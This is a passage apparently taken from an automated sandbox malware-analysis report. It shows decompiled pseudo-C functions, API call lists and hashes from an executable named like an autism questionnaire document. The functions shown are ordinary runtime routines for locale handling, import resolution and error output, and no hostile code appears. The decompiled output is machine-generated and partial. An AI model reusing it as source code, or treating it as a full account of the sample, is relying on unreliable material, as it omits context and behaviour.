                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$Info$ThreadValid
                                                                                              • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                                                              • API String ID: 233154393-2808312488
                                                                                              • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                              • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                                                              • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                                                              • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A7E4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 71%
                                                                                              			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}









                                                                                              0x0040a7e4
                                                                                              0x0040a7e7
                                                                                              0x0040a7e9
                                                                                              0x0040a7ea
                                                                                              0x0040a7eb
                                                                                              0x0040a7ed
                                                                                              0x0040a7f1
                                                                                              0x0040a7f2
                                                                                              0x0040a7f7
                                                                                              0x0040a7fa
                                                                                              0x0040a802
                                                                                              0x0040a80e
                                                                                              0x0040a835
                                                                                              0x0040a83c
                                                                                              0x0040a84e
                                                                                              0x0040a857
                                                                                              0x0040a868
                                                                                              0x0040a86d
                                                                                              0x0040a875
                                                                                              0x0040a87a
                                                                                              0x0040a883
                                                                                              0x0040a883
                                                                                              0x0040a888
                                                                                              0x0040a890
                                                                                              0x0040a89a
                                                                                              0x0040a89a
                                                                                              0x0040a859
                                                                                              0x0040a85d
                                                                                              0x0040a85d
                                                                                              0x0040a857
                                                                                              0x0040a8a4
                                                                                              0x0040a8a9
                                                                                              0x0040a8c3
                                                                                              0x0040a8cd
                                                                                              0x0040a810
                                                                                              0x0040a81c
                                                                                              0x0040a826
                                                                                              0x0040a826
                                                                                              0x0040a8d4
                                                                                              0x0040a8d7
                                                                                              0x0040a8da
                                                                                              0x0040a8e7

                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                                                              • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                                                              • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                                                              • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                                                              • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                                                              • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                              • String ID: en-US,en,
                                                                                              • API String ID: 975949045-3579323720
                                                                                              • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                                              • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                                                              • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                                                              • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042301C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 61%
                                                                                              			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}










                                                                                              0x00423022
                                                                                              0x00423025
                                                                                              0x00423028
                                                                                              0x0042302d
                                                                                              0x0042302e
                                                                                              0x00423033
                                                                                              0x00423036
                                                                                              0x00423049
                                                                                              0x00423050
                                                                                              0x00423063
                                                                                              0x004230b8
                                                                                              0x004230c5
                                                                                              0x004230ce
                                                                                              0x004230ce
                                                                                              0x00423065
                                                                                              0x00423080
                                                                                              0x0042308d
                                                                                              0x00423096
                                                                                              0x00423096
                                                                                              0x00423080
                                                                                              0x004230de
                                                                                              0x004230e9
                                                                                              0x004230f4
                                                                                              0x004230f4
                                                                                              0x00423052
                                                                                              0x00423052
                                                                                              0x00423054
                                                                                              0x004230fa
                                                                                              0x004230fd
                                                                                              0x00423100
                                                                                              0x00423108
                                                                                              0x00423115

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                                                                • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseHandleModuleProc
                                                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                              • API String ID: 4190037839-2401316094
                                                                                              • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                                              • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                                                              • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                                                              • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040D218, Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 67%
                                                                                              			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}







































                                                                                              0x0040d22c
                                                                                              0x0040d232
                                                                                              0x0040d234
                                                                                              0x0040d237
                                                                                              0x0040d244
                                                                                              0x0040d251
                                                                                              0x0040d25e
                                                                                              0x0040d26b
                                                                                              0x0040d278
                                                                                              0x0040d285
                                                                                              0x0040d28e
                                                                                              0x0040d29c
                                                                                              0x0040d29e
                                                                                              0x0040d29f
                                                                                              0x0040d2a5
                                                                                              0x0040d2ab
                                                                                              0x0040d2b2
                                                                                              0x0040d2b4
                                                                                              0x0040d2ba
                                                                                              0x0040d2c0
                                                                                              0x0040d2d0
                                                                                              0x00000000
                                                                                              0x0040d2d5
                                                                                              0x0040d2e2
                                                                                              0x0040d2e7
                                                                                              0x0040d2e9
                                                                                              0x0040d2eb
                                                                                              0x0040d2eb
                                                                                              0x0040d2f1
                                                                                              0x0040d2f4
                                                                                              0x0040d2fc
                                                                                              0x0040d306
                                                                                              0x0040d309
                                                                                              0x0040d30e
                                                                                              0x0040d329
                                                                                              0x0040d310
                                                                                              0x0040d31c
                                                                                              0x0040d31c
                                                                                              0x0040d32c
                                                                                              0x0040d335
                                                                                              0x0040d34e
                                                                                              0x0040d350
                                                                                              0x0040d412
                                                                                              0x0040d412
                                                                                              0x0040d41c
                                                                                              0x0040d42a
                                                                                              0x0040d42a
                                                                                              0x0040d42e
                                                                                              0x0040d47b
                                                                                              0x0040d47d
                                                                                              0x0040d484
                                                                                              0x0040d48e
                                                                                              0x0040d49c
                                                                                              0x0040d49c
                                                                                              0x0040d4a0
                                                                                              0x0040d4a2
                                                                                              0x0040d4a7
                                                                                              0x0040d4ad
                                                                                              0x0040d4bd
                                                                                              0x0040d4c2
                                                                                              0x0040d4c2
                                                                                              0x0040d4a0
                                                                                              0x00000000
                                                                                              0x0040d430
                                                                                              0x0040d434
                                                                                              0x0040d46f
                                                                                              0x0040d479
                                                                                              0x00000000
                                                                                              0x0040d43c
                                                                                              0x0040d43f
                                                                                              0x0040d447
                                                                                              0x00000000
                                                                                              0x0040d460
                                                                                              0x0040d466
                                                                                              0x0040d46b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040d4c5
                                                                                              0x0040d4c8
                                                                                              0x00000000
                                                                                              0x0040d4c8
                                                                                              0x0040d447
                                                                                              0x0040d434
                                                                                              0x0040d42e
                                                                                              0x0040d35d
                                                                                              0x0040d36b
                                                                                              0x0040d36b
                                                                                              0x0040d36f
                                                                                              0x0040d37a
                                                                                              0x0040d37a
                                                                                              0x0040d37e
                                                                                              0x0040d3cb
                                                                                              0x0040d3d7
                                                                                              0x0040d40d
                                                                                              0x0040d3d9
                                                                                              0x0040d3dd
                                                                                              0x0040d3e3
                                                                                              0x0040d3e8
                                                                                              0x0040d3ed
                                                                                              0x0040d3f4
                                                                                              0x0040d3fa
                                                                                              0x0040d3ff
                                                                                              0x0040d404
                                                                                              0x0040d404
                                                                                              0x0040d3ed
                                                                                              0x0040d3dd
                                                                                              0x00000000
                                                                                              0x0040d380
                                                                                              0x0040d385
                                                                                              0x0040d38f
                                                                                              0x0040d39d
                                                                                              0x0040d39d
                                                                                              0x0040d3a1
                                                                                              0x00000000
                                                                                              0x0040d3a3
                                                                                              0x0040d3a3
                                                                                              0x0040d3a8
                                                                                              0x0040d3ae
                                                                                              0x0040d3be
                                                                                              0x00000000
                                                                                              0x0040d3c3
                                                                                              0x0040d3a1
                                                                                              0x0040d337
                                                                                              0x0040d343
                                                                                              0x0040d347
                                                                                              0x00000000
                                                                                              0x0040d349
                                                                                              0x0040d4ca
                                                                                              0x0040d4d1
                                                                                              0x0040d4d5
                                                                                              0x0040d4d8
                                                                                              0x0040d4db
                                                                                              0x0040d4e4
                                                                                              0x0040d4e4
                                                                                              0x00000000
                                                                                              0x0040d4ea
                                                                                              0x0040d347

                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                              • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                                                              • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                                                              • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004047B0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 72%
                                                                                              			E004047B0(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x4bb058 == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L00403780();
				} else {
					_t7 = E00407EF0(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x4b7078; // 0x403920
					_t12 = E00407EF0(_t11);
					_t13 =  *0x4b7078; // 0x403920
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E00407EF0(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                                                              0x004047b0
                                                                                              0x004047b3
                                                                                              0x004047b5
                                                                                              0x004047be
                                                                                              0x00404821
                                                                                              0x00404826
                                                                                              0x00404827
                                                                                              0x00404828
                                                                                              0x0040482a
                                                                                              0x004047c0
                                                                                              0x004047c9
                                                                                              0x004047d8
                                                                                              0x004047e4
                                                                                              0x004047e9
                                                                                              0x004047ef
                                                                                              0x004047fd
                                                                                              0x0040480b
                                                                                              0x0040481a
                                                                                              0x0040481a
                                                                                              0x00404832

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                                                              • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite
                                                                                              • String ID: 9@
                                                                                              • API String ID: 3320372497-3209974744
                                                                                              • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                              • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                                                              • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                                                              • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041F0F4, Relevance: 12.1, APIs: 8, Instructions: 97filewindowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 62%
                                                                                              			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char* _v8;
				long _v12;
				short _v140;
				short _v2188;
				void* _t15;
				char* _t17;
				intOrPtr _t19;
				intOrPtr _t30;
				long _t48;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t61;
				void* _t64;

				_push(__ebx);
				_push(__esi);
				_v8 = 0;
				_push(_t64);
				_push(0x41f219);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t64 + 0xfffff778;
				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
				_t17 =  *0x4ba6c0; // 0x4bb058
				if( *_t17 == 0) {
					_t19 =  *0x4ba4f8; // 0x40e710
					_t11 = _t19 + 4; // 0xffed
					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
				} else {
					_t30 =  *0x4ba524; // 0x4bb340
					E00405564(E00405820(_t30));
					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
					_push(_t48);
					E00409C00();
					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41f220);
				_t57 =  *0x41f0c4; // 0x41f0c8
				return E00409D24( &_v8, _t57);
			}
















                                                                                              0x0041f0fd
                                                                                              0x0041f0fe
                                                                                              0x0041f101
                                                                                              0x0041f106
                                                                                              0x0041f107
                                                                                              0x0041f10c
                                                                                              0x0041f10f
                                                                                              0x0041f122
                                                                                              0x0041f124
                                                                                              0x0041f12c
                                                                                              0x0041f1ca
                                                                                              0x0041f1cf
                                                                                              0x0041f1de
                                                                                              0x0041f1f8
                                                                                              0x0041f132
                                                                                              0x0041f132
                                                                                              0x0041f13c
                                                                                              0x0041f15a
                                                                                              0x0041f15c
                                                                                              0x0041f16b
                                                                                              0x0041f188
                                                                                              0x0041f1a0
                                                                                              0x0041f1ba
                                                                                              0x0041f1ba
                                                                                              0x0041f1ff
                                                                                              0x0041f202
                                                                                              0x0041f205
                                                                                              0x0041f20d
                                                                                              0x0041f218

                                                                                              APIs
                                                                                                • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                                                                • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                                                                • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                                                                • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                                                              • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                                                              • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                                                              • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                                                              • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
